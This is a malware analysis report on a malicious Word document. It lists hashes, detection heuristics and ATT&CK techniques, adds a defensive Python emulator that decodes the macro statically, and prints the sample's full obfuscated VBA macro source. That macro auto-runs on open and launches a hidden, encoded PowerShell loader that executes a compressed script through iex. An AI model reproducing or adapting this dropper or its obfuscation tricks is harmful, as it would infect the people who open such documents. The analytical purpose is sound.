Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 09b8c6fa45ecc2cb…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 96.2 KB
Created: 2018-06-08 06:16:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 976d91c754d19e03ca59cf16ce251738
SHA-1: ac1992105eb72ac63d96ebfaa3736e1edef751a0
SHA-256: 09b8c6fa45ecc2cbe43521d8d65d6a27226e6978c602dfd894b78908ab982824
Risk score: 210

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word document (OLE) carrying a VBA project. Its auto-exec entry point, Sub Autoopen, calls the function IwmLQYzjw, which hands a concatenated string to Shell with window style 50726 - 50726 = 0 (vbHide). The string can be reassembled from the listing below: XQSTC and the other bare identifiers are never assigned and evaluate to Empty, Chr(wlzAz + vbKeyP + TdKCWaqYuwB) is Chr(80) = "P", and each helper function returns a run of base64 chunks, so the command is PowersHeLL -e <base64>. The base64 is UTF-16LE and decodes to a one-liner that base64-decodes an inner blob, wraps it in IO.Compression.DeflateStream in decompress mode, reads the result back as ASCII text and pipes it to an invoke-expression spelled from $ShellId characters ($ShellId[1]+$ShellId[13]+'x', i.e. iex). The inner deflated script is not decoded in this static pass, so its network behaviour, including any download of a secondary payload, is an inference from the loader pattern rather than something recovered from the file. The nested For loops around the string assignments compute nothing the payload uses; they are padding to defeat signature matching and to slow manual reading. The ClamAV detection and the critical Shell-call heuristic support this assessment.
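To make that reassembly reproducible without opening the document, here is an added Python example, not part of the report or of the analysis platform, that statically recovers the Shell command from a macro written in this style: it parses Function bodies, evaluates the chunked string assignments and the Chr(vbKeyP) trick, treats never-assigned identifiers as Empty, records Shell() calls instead of executing them, and decodes the -e argument as UTF-16LE base64. It runs against a constructed macro with hypothetical names whose encoded command is just Get-Location; the sample's own macros.bas can be fed to the same class. The emulator only models string concatenation and +/- arithmetic, which is all this family needs; anything else (CBool, Oct, Rnd and the rest of the junk) is deliberately left unmodelled and evaluates to Empty.

```python
import base64
import re

# Constructed sample in the style of the page's extracted macro (hypothetical names):
# chunked string builders, Chr(vbKeyP) = "P", a junk loop, hidden-window Shell call. Its
# encoded command is base64(UTF-16LE("Get-Location")), NOT the sample's own payload.
SAMPLE_MACRO = r'''
Function svfB()
For iSMzR = YYYoKM To drfmDk
   jYdiBU = 47955 - 53461
Next
hdJQ = "HeLL -e RwBl" + "AHQALQBM"
VOoz = "AG8AYwBh"
svfB = hdJQ + VOoz
End Function
Function nIcz()
nIcz = "AHQAaQBv" + "AG4A"
End Function
Function IwmL()
IwmL = pqzZ + Shell(XQSTC + Chr(wlzAz + vbKeyP + TdKC) + "owers" + svfB + nIcz, 50726 - 50726)
End Function
Sub Autoopen()
On Error Resume Next
IwmL
End Sub
'''

VB_CONSTS = {"vbKeyP": 80}                  # VBA key-code constant abused as a Chr() argument
AUTO_EXEC = {"autoopen", "auto_open", "document_open", "autoexec", "workbook_open"}
FUNC_RE = re.compile(r"^Function (\w+)\(\)(.*?)^End Function", re.S | re.M)
SUB_RE = re.compile(r"^Sub (\w+)\(\)(.*?)^End Sub", re.S | re.M)
ASSIGN_RE = re.compile(r"^\s*(\w+) = (.+)$", re.M)


def split_top(expr, sep):
    """Split on sep at paren depth 0 and outside "..." (base64 chunks may contain '+')."""
    parts, cur, depth, in_str = [], "", 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in "()":
            depth += 1 if ch == "(" else -1
        elif not in_str and ch == sep and depth == 0:
            parts.append(cur)
            cur = ""
            continue
        cur += ch
    return parts + [cur]


class MacroEmulator:
    def __init__(self, src):
        self.src = src
        self.funcs = {m.group(1): ASSIGN_RE.findall(m.group(2)) for m in FUNC_RE.finditer(src)}
        self.shell_calls = []               # (command line, window style) per Shell() reached

    def eval_num(self, expr, scope):
        expr = expr.strip()
        for op in "+-":
            parts = split_top(expr, op)
            if len(parts) > 1:
                vals = [self.eval_num(p, scope) for p in parts]
                return sum(vals) if op == "+" else vals[0] - sum(vals[1:])
        if expr.startswith("(") and expr.endswith(")"):
            return self.eval_num(expr[1:-1], scope)
        return int(expr) if expr.isdigit() else VB_CONSTS.get(expr, 0)  # unset Variant -> 0

    def eval_str(self, expr, scope):
        out = ""
        for term in (t.strip() for t in split_top(expr, "+")):
            if term[:1] == '"' and term[-1:] == '"':
                out += term[1:-1]
            elif term.startswith("Chr("):
                out += chr(self.eval_num(term[4:-1], scope))
            elif term.startswith("Shell("):          # record, never execute
                args = split_top(term[6:-1], ",")
                style = self.eval_num(args[1], scope) if len(args) > 1 else 1
                self.shell_calls.append((self.eval_str(args[0], scope), style))
            elif term in scope:
                out += scope[term]
            elif term in self.funcs:
                out += self.call(term)
            # anything else is an unset Variant, i.e. "" in string concatenation
        return out

    def call(self, name):
        scope = {}
        for lhs, rhs in self.funcs[name]:   # assignments in source order
            scope[lhs] = self.eval_str(rhs, scope)
        return scope.get(name, "")          # the function's return value

    def run_autoexec(self):
        """Walk auto-exec Subs and call each bare function name they invoke."""
        for m in SUB_RE.finditer(self.src):
            if m.group(1).lower() in AUTO_EXEC:
                for line in m.group(2).splitlines():
                    if line.strip() in self.funcs:
                        self.call(line.strip())
        return self.shell_calls


def decode_encoded_command(cmdline):
    """Recover the script behind 'powershell -e/-enc <base64 of UTF-16LE>'."""
    m = re.search(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16le") if m else None
```

On the macros.bas carved below, MacroEmulator(open("macros.bas").read()).run_autoexec() reports a single Shell() with window style 0 (vbHide), and decode_encoded_command() on it yields the DeflateStream one-liner quoted above. The inner blob that one-liner carries is a raw deflate stream without a zlib header, so the next step in a manual analysis is zlib.decompress(base64.b64decode(blob), -15) rather than a plain zlib decode.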

Heuristics (7)

  • ClamAV: Doc.Malware.Valyria-6884775-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6884775-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Next
    IwmLQYzjw = pqzZFaniPu + Shell(XQSTC + Chr(wlzAz + vbKeyP + TdKCWaqYuwB) + "owers" + svfBDnAPGfM + nIczik + CtoLjcJqoL + umwMNiNXN + PEKJv + fUNKDmHphqP, 50726 - 50726)
    For SzKEp = zozHwc To jfhHh
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub Autoopen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The generic rule text ("no modern VBA project was recovered") does not describe this sample: olevba did recover the VBA project (macros.bas below), so here the finding is redundant with OLE_VBA_AUTOOPEN and is analyst-facing evidence of the auto-exec surface only, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the DrawingML XML namespace identifier that Office writes into any document containing drawing objects. It is never contacted at runtime and should not be treated as an indicator or blocked.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12060 bytes
SHA-256: a634173f7e9323da9bcda05e24ec0e3c574b83bfb4e3e6abd095f05a32cd623a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FCWHLowuhS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function IwmLQYzjw()
On Error Resume Next
For iSMzR = YYYoKM To drfmDk
      For wVsJvX = rLBwV To 29841
         uAwOZ = (3309 / CBool(czQEij) - ZZvjoc / Oct(42764 / Hex(24791) / CBtjhN + Rnd(pozOi / Fix(37))))
Next
   jYdiBU = 47955 - 53461
Next
For RrRRl = Sjmwh To tMfSPP
      For bPjRL = pWCGbC To 76835
         zjCRPb = (33140 / CBool(HKQBQ) - MzQlEz / Oct(1401 / Hex(80441) / ZFjvjP + Rnd(Lwtcwd / Fix(37))))
Next
   BAoIDH = 42413 - 2567
Next
IwmLQYzjw = pqzZFaniPu + Shell(XQSTC + Chr(wlzAz + vbKeyP + TdKCWaqYuwB) + "owers" + svfBDnAPGfM + nIczik + CtoLjcJqoL + umwMNiNXN + PEKJv + fUNKDmHphqP, 50726 - 50726)
For SzKEp = zozHwc To jfhHh
      For UHotjU = lPqzi To 28649
         vQwZK = (70730 / CBool(wFioi) - pUJav / Oct(51178 / Hex(43603) / DiGbkb + Rnd(hzAZj / Fix(37))))
Next
   PPjIz = 93075 - 57705
Next
End Function
Sub Autoopen()
On Error Resume Next
For CJEET = RGQBH To rsmpza
      For QQHiP = wZEaSw To 58103
         KAUBWQ = (3590 / CBool(bhzRrN) - ctKXm / Oct(25208 / Hex(11153) / ipKXzM + Rnd(wDdzjr / Fix(37))))
Next
   obJHd = 79121 - 49381
Next
IwmLQYzjw
For zCjCcj = arfEF To LMtCau
      For wosjfK = jNijQ To 40798
         rHozkz = (82390 / CBool(lTblbc) - QFDuq / Oct(67423 / Hex(16672) / CWRcX + Rnd(Mwokq / Fix(37))))
Next
   EFFpv = 86179 - 38706
Next
End Sub


Attribute VB_Name = "YEuicVz"
Function svfBDnAPGfM()
On Error Resume Next
For IkKiR = nQKQr To ISJilj
      For pzisuH = NnoCq To 67518
         PuvEX = (68271 / CBool(BwKYuc) - zQhRF / Oct(91292 / Hex(98871) / isPaA + Rnd(zbHZIh / Fix(37))))
Next
   XNdOzC = 77630 - 6823
Next
hdJQzb = "HeLL -e KAAgAG4" + "AZQB3AC0AbwBiAE" + "oAZQBDAFQAIABp" + "AE8ALgBDAG" + "8AbQBQA" + "HIARQBzAFMAS" + "QBvAG4ALgBEA" + "GUAZgBsAGEAdABl" + "AFMAVAByA" + "GUA"
For TAiON = HllnL To QDowj
      For BUCwlv = bCDDF To 86251
         AKYPw = (73568 / CBool(cUWnUV) - HKoRQU / Oct(74589 / Hex(67467) / UOiDl + Rnd(DhfuA / Fix(37))))
Next
   FiZAw = 7990 - 48351
Next
VOozGpJ = "YQBNACg" + "AWwBpAG8ALgBNA" + "EUAbQBPAHIAeQ" + "BzAHQAUgBlA" + "EEAbQBdAFs" + "AYwBPAG4AdgBlA" + "FIAdABdAD" + "oAOgBm" + "AHIATw"
For fLRZi = sOlpY To RtDAN
      For sIQpHZ = UBfPR To 37642
         NjlJz = (17189 / CBool(Rbpvq) - cuMaY / Oct(75356 / Hex(26667) / QjqDr + Rnd(JSMzU / Fix(37))))
Next
   IKiIu = 6483 - 8418
Next
zHzKtqlnjK = "BNAEIAQQBz" + "AGUANgA0AFMAVA" + "ByAG" + "kAbg" + "BHACgAIAAnAFYAW" + "gB" + "CAH"
For ajbtR = tapFq To FEwzuG
      For EOwOp = UMRMEj To 41476
         DkkIwl = (76321 / CBool(jdHJq) - ENiNo / Oct(95281 / Hex(99740) / cRlTwq + Rnd(NkZUvC / Fix(37))))
Next
   MrzUS = 87629 - 59881
Next
mVARHQcU = "QAUwA4AE4A" + "QQBEAE0AZQA" + "vAHkAc" + "gAwAG" + "8AdABN" + "AFAAdAB" + "qAGoAbQB"
For HjjEI = iqsYi To ISWdp
      For iWsiov = lArPT To 60408
         QGKEj = (85127 / CBool(YjtjwM) - KuUTiV / Oct(20599 / Hex(17034) / ZsnqWC + Rnd(bYscsB / Fix(37))))
Next
   RuwOK = 74684 - 98151
Next
jowAJR = "mAHMA" + "QQBnACsAbwA0AD" + "QATgB" + "wA"
For rjUaG = woKvH To kMvBLV
      For SIEjBJ = CZiHAW To 56555
         AEWww = (31538 / CBool(jihkXX) - zvCoq / Oct(61976 / Hex(85212) / ASRTTW + Rnd(CvlAM / Fix(37))))
Next
   rfPZj = 76783 - 49062
Next
LkChSPa = "GMA" + "cQBtAEMAS" + "ABLADkAWgB0AHQA" + "dAAxADAAdgBYAG" + "kAK" + "wBzAGUAMgBI"
svfBDnAPGfM = hdJQzb + VOozGpJ + zHzKtqlnjK + mVARHQcU + jowAJR + LkChSPa
End Function
Function nIczik()
On Error Resume Next
For CQlPw = mFLfzj To EDfdw
      For cflzW = rHPmP To 19582
         SSzBfD = (41525 / CBool(UzjFDf) - nbkwj / Oct(61268 / Hex(94527) / QROEGS + Rnd(SwVEN / Fix(37))))
Next
   GBzZbL = 16042 - 65379
Next
CKYSzAoi = "AGYAMwAxAEs" + "AcgA0AEoAcABE" + "ADgAawB2" + "AHoAegBUADcA" + "QQB3AEoA" + "cAArAHoA" + "RQAyAGEAaA" + "BhA"
For tSfrU = CSaMVc To kRzPiz
      For mkwSGj = lXIUo To 15027
         XvYOz = (66698 / CBool(dusrR) - RiZLh / Oct(21756 / Hex(4816) / JUNlo + Rnd(RvSsj / Fix(37))))
Next
   SNVaA = 62266 - 27593
Next
iSomXRBSSz = "G0ARQ" + "A2AEIAVQBXA" + "HMA" + "bABEAGIARAB"
For IpGao = ICzwm To FwNbLd
      For UwicA = zGENz To 20504
         wmGUN = (74399 / CBool(hGOwVF) - PTztO / Oct(45693 / Hex(44122) / RaNGPr + Rnd(Epwllj / Fix(37))))
Next
   ssOZj = 54106 - 26048
Next
hriNzE = "QAEEANABHAHcA" + "MwBWAFYAbQBmA" + "DgAcwBXAFQAbQB" + "DAG4AUABl" + "AEIAK" + "wBBA" + "EQA" + "UwBDADYAUAB" + "CAFUA"
For kGvHhn = UkmiC To jHHXF
      For CZzjTW = bGipru To 63079
         pGLHJM = (99113 / CBool(NzHdz) - lGBbu / Oct(21326 / Hex(20059) / WbklLz + Rnd(uvjVmq / Fix(37))))
Next
   wPvUC = 6716 - 73412
Next
uUbrt = "aAB5ADgAcgBOA" + "GUATAA2AHMAWgAz" + "AGgAaAB" + "PAGkANABsA" + "GcASQBMAEUAaQ" + "ByAGsA" + "YwBIAEsAYwBZAF" + "cANQBPA" + "EoATAB6AEoAOA" + "BRADkAY"
nIczik = CKYSzAoi + iSomXRBSSz + hriNzE + uUbrt
End Function
Function CtoLjcJqoL()
On Error Resume Next
For LszPVX = QAVXFk To WYABjT
      For YIKVk = mfaIG To 97069
         PsmwcR = (12989 / CBool(jAPlQN) - XTAXTh / Oct(76072 / Hex(70720) / ukNBkZ + Rnd(QGzTi / Fix(37))))
Next
   EZOMXo = 15363 - 91745
Next
mYKTKl = "wBWAHAAagBwA" + "DMATQB2ADQAcg" + "BnAGIAaQ" + "A5AHUANwB" + "mAG" + "wAOQAyAGY"
For UzuIGH = fDcHzC To DFuJmw
      For QtNkPb = GJwcs To 19377
         QHcTG = (63857 / CBool(vrXoBi) - GdfVz / Oct(9963 / Hex(7059) / jXqfb + Rnd(udiFs / Fix(37))))
Next
   nzSpjR = 6640 - 41847
Next
jAuPaXUK = "ANABtA" + "EIA" + "WABC" + "AEoAMwBNAHo"
For pvOtz = jTHvEM To aEdaG
      For ANtjJ = XIKpp To 62383
         hCqbc = (74792 / CBool(YOKXKn) - bXNMF / Oct(20836 / Hex(1037) / nwMEm + Rnd(qVdSOD / Fix(37))))
Next
   KjdBnd = 58548 - 74439
Next
PZKjGm = "ASAB" + "vAE" + "wAdAB1AHIAMw" + "AvAEkA" + "WQBNAFIAc" + "wBo" + "AEUAcgBk" + "AEE"
For WZVrv = zdjVBM To uPXAC
      For shEvkk = nkKSh To 42489
         kamjvi = (10298 / CBool(zitBR) - pNdnaw / Oct(88465 / Hex(42279) / ilGiz + Rnd(SRnfi / Fix(37))))
Next
   UcoFXc = 39596 - 65476
Next
CmlwJSWJHh = "ANABuADEA" + "NgAxA" + "FYAVgAvAHUAdw" + "BnAFcAawBKAF" + "oAWQBXAF" + "cANgBOA" + "DYARAB5AGYAdA"
For CiTVw = jfHZo To IIzoA
      For LjRFW = SUlphC To 40057
         nvcDn = (18754 / CBool(qmmjFq) - LUqRX / Oct(39950 / Hex(18041) / EwLjC + Rnd(lrzEEO / Fix(37))))
Next
   NjuBqH = 40064 - 88873
Next
RHLpNiSTA = "BXAGUAcABDAEgA" + "bA" + "BTAE" + "cARQAxAFIAZ" + "QBC"
CtoLjcJqoL = mYKTKl + jAuPaXUK + PZKjGm + CmlwJSWJHh + RHLpNiSTA
End Function
Function umwMNiNXN()
On Error Resume Next
For YQwDJR = QfAQmq To rGHVFv
      For cBbozn = PhMoHZ To 46573
         kzUUrh = (48160 / CBool(woXBD) - jmPzrw / Oct(29326 / Hex(39148) / MdDAw + Rnd(biRGwV / Fix(37))))
Next
   BlDHD = 95026 - 55735
Next
OwFIBKDzQfh = "AG8AMgA0AGs" + "AQQAvADMAZg" + "BUAE8ALw" + "BYAFgA" + "QgBsADE" + "AbQAvAFkAMABsA" + "FIAdQA" + "4AGsA"
For ZmsUw = YIibfQ To IqojbR
      For JGuGZ = kivjtR To 83413
         mrKjz = (23627 / CBool(WifRF) - tuObc / Oct(62145 / Hex(10969) / TrmvWq + Rnd(MwiNYW / Fix(37))))
Next
   zizbE = 39746 - 75032
Next
RZoiWBG = "TwA5AC8AYwBQ" + "AG" + "QAagB1AGUAUAAy" + "AF" + "QASgBzAFAAdgBKA"
For PoTFq = hIRllX To zXkdV
      For KkwEj = XvjbB To 52886
         DvcwbR = (98954 / CBool(ipRbn) - DAHPzi / Oct(23860 / Hex(55669) / SknFTo + Rnd(hQKATW / Fix(37))))
Next
   ZJMWz = 59942 - 89657
Next
FIfuKu = "HcAUwA2AE8AdgBi" + "ADI" + "AQwA3AGIARAB" + "3AE4A" + "ZgB" + "TA" + "HgASAB2AFUA" + "cABoAHkAVwBFAD" + "gAUQBoAEwAawB"
For ctBUvc = DsYaI To NnMfV
      For IARmfj = iFkMOz To 85582
         IuEztU = (41225 / CBool(RctOL) - VAqbz / Oct(73427 / Hex(59538) / GVnRu + Rnd(SfJdQ / Fix(37))))
Next
   FtHjc = 23921 - 75011
Next
NwqHaRJzii = "HAG8AUwBCAGYA" + "UABiAFgAQ" + "gBjAHoAcAB" + "pADIAcgB6AFQAYw" + "AyAFYAS" + "wA" + "0ADIAOQBjAC" + "8ANAB"
umwMNiNXN = OwFIBKDzQfh + RZoiWBG + FIfuKu + NwqHaRJzii
End Function
Function PEKJv()
On Error Resume Next
For AKmRRW = kWmzGH To niLcaP
      For lSQwnF = sKzlzq To 18635
         jVzXVi = (18986 / CBool(dJQHF) - UAmXv / Oct(28627 / Hex(85765) / TiRIr + Rnd(nOHRo / Fix(37))))
Next
   wqcCtK = 53298 - 90209
Next
XnYosC = "wAFQALwBI" + "AG8A" + "TQB5AHUA" + "dA" + "BZ" + "AEcAZgBa" + "AHYANgBJAEM"
For oXzVSp = zbvuDN To VGNqw
      For OCzTNb = Xkiknz To 67453
         HTmZVp = (29511 / CBool(VtokoH) - jTdLYl / Oct(45329 / Hex(58965) / rLaOz + Rnd(HFiWO / Fix(37))))
Next
   aRcuzW = 57165 - 49193
Next
nWCiPp = "AWgBYAG" + "EAagBxAE4ARwBrA" + "DMAMQByAE4A" + "dQBLAEUAWgBFA" + "G0AdA" + "ArAHgA" + "SQBWAE8AR" + "gBkAFg" + "ANAA5AFMATAB" + "6AE8ASwB0AGsA"
For rqQoz = JmKtj To ihKOAi
      For liFRt = FBBRY To 28261
         FiAVKa = (99270 / CBool(wTTciz) - kSjwoS / Oct(76162 / Hex(81588) / YXfrOI + Rnd(lfpjv / Fix(37))))
Next
   oDaiRn = 29826 - 72592
Next
OQNEYMC = "cQBRAG0A" + "bQA2AH" + "IAV" + "QBCAEsAMAB" + "KAE8AbQBMAEIARw" + "A3A" + "DkAYQBLAHYAQwAv"
For OKKRjk = abRsO To nuHfpw
      For zpOACd = YFBzaz To 69104
         UhzZk = (23018 / CBool(OSDSs) - famwR / Oct(7231 / Hex(82560) / wJPGI + Rnd(UZRRP / Fix(37))))
Next
   iZahQ = 27269 - 42356
Next
VzLVHvUaYCP = "AFIAY" + "wB0ADcAZgBrAEM" + "ATwBJAGQANQB1A" + "FAAdwBBAD0AJwA" + "gACkALABbAEk" + "AbwAuAGM" + "ATwBNAHAA" + "UgBlA" + "HMAUwBJAE" + "8AbgAuAEM"
For avwkkL = fPBJvt To YXiSbK
      For oAmDfm = AEhDh To 96341
         ANiVwH = (79204 / CBool(QHTTv) - CzzmL / Oct(15551 / Hex(74259) / KjFZoi + Rnd(UGOul / Fix(37))))
Next
   KDziD = 91469 - 56557
Next
ovIEkpUl = "ATwBtAFA" + "AcgBFAFMAcwB" + "pAG8ATgBt" + "AG8AZABFAF0AOg" + "A6AEQARQBDAG8A" + "TQBQAHIARQ" + "BT"
For ijLrDz = jQWqL To DwPXT
      For AwAFY = iswAI To 15166
         JKfzt = (66368 / CBool(jGkqrE) - RHFiH / Oct(68805 / Hex(70846) / odimhZ + Rnd(HjIOd / Fix(37))))
Next
   uXAVo = 67938 - 58126
Next
FuTOLm = "AFMAKQAgAHwAI" + "ABm" + "AG8AcgB" + "lAGEAQwBoAC0Ab" + "wBiAEoAZQBD" + "AFQAIAB7"
For LKNTkM = rSBYbf To CTHBK
      For zAicbW = jEMSA To 12727
         cTQSwN = (39196 / CBool(RGqBW) - VhOnY / Oct(6379 / Hex(89016) / clsNp + Rnd(nFiXV / Fix(37))))
Next
   ujDoEz = 12564 - 68500
Next
JJbAujuOzYB = "ACAAb" + "gBlAH" + "cALQBvAGIASgB" + "lAE" + "MAVAAgAHMAeQBz" + "AHQAZQBtAC4A" + "SQBvAC4AUw" + "B0AFIARQBhA" + "G0AcgBFAEE" + "AZA"
For bmZAzO = zibDp To qfajX
      For cLXSj = cliaib To 93814
         bAwSN = (80934 / CBool(QIEvRG) - sYOVZn / Oct(14547 / Hex(46331) / TsZWc + Rnd(XvAGiq / Fix(37))))
Next
   jHVhjL = 6260 - 37771
Next
PcEzMLiki = "BFAFIAKAA" + "kAF8ALABbAFQA" + "RQBY" + "AHQALgBlAG" + "4AYwBPAEQASQ" + "BOAGcAXQA6A" + "DoAYQBTAE" + "MASQ" + "BJACAAKQA"
For OUztG = NBJDD To fanTJX
      For IvLbnB = GzsGvU To 68756
         dEXjmK = (65457 / CBool(zbmsAh) - NXnSKb / Oct(7193 / Hex(87396) / rOFOI + Rnd(HiNjw / Fix(37))))
Next
   walaaw = 27035 - 98684
Next
ABLMP = "gAH0AIAB8AE" + "YAbwBSAEUAQQB" + "DA" + "EgALQBPAEI" + "ASgBl" + "AGMAdAAgAHsAJAB" + "fAC4AUgBl" + "AEEARAB0AG8A"
For JrZRi = ICYUaL To rYFTq
      For UEfRkw = wCskf To 80157
         LiWfwi = (35959 / CBool(foOWXl) - MUGFTi / Oct(91704 / Hex(57943) / pSNnF + Rnd(opkRz / Fix(37))))
Next
   BZXMc = 41607 - 48036
Next
TfUHKBvFl = "RQ" + "BuAGQAKAApACA" + "AfQApACAAfAAm" + "ACAAKAAgACQ" + "Acw" + "BIAGUATAB"
PEKJv = XnYosC + nWCiPp + OQNEYMC + VzLVHvUaYCP + ovIEkpUl + FuTOLm + JJbAujuOzYB + PcEzMLiki + ABLMP + TfUHKBvFl
End Function
Function fUNKDmHphqP()
On Error Resume Next
For DOajNq = dZWPQ To zqdRf
      For VAYlGm = LujtrI To 43674
         WasjaO = (74598 / CBool(QOBjE) - juvwb / Oct(7199 / Hex(80980) / cTumid + Rnd(jiGtQa / Fix(37))))
Next
   lkFii = 79002 - 16663
Next
risDmJjUNQ = "sAGkARA" + "BbADEAXQAr" + "ACQAUwBIAEU" + "ATABMAEkAZABbA" + "DEAMwB" + "dACsAJwB4A" + "CcAKQA="
fUNKDmHphqP = risDmJjUNQ
End Function